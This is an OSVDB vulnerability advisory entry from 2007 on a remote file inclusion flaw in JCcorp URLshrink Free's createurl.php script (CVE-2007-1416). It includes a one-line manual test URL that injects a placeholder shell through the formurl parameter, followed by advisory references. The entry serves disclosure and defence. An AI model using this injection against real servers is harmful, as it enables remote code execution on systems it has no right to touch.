JCcorp URLshrink Free createurl.php formurl Variable Remote File Inclusion

2007-03-09T11:03:51
ID OSVDB:33982
Type osvdb
Reporter OSVDB
Modified 2007-03-09T11:03:51

Description

Manual Testing Notes

http://[target]/Path_Script/createurl.php?formurl=[Shell-Attack]

References:

Secunia Advisory ID:24340 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0066.html FrSIRT Advisory: ADV-2007-0902 CVE-2007-1416 Bugtraq ID: 22894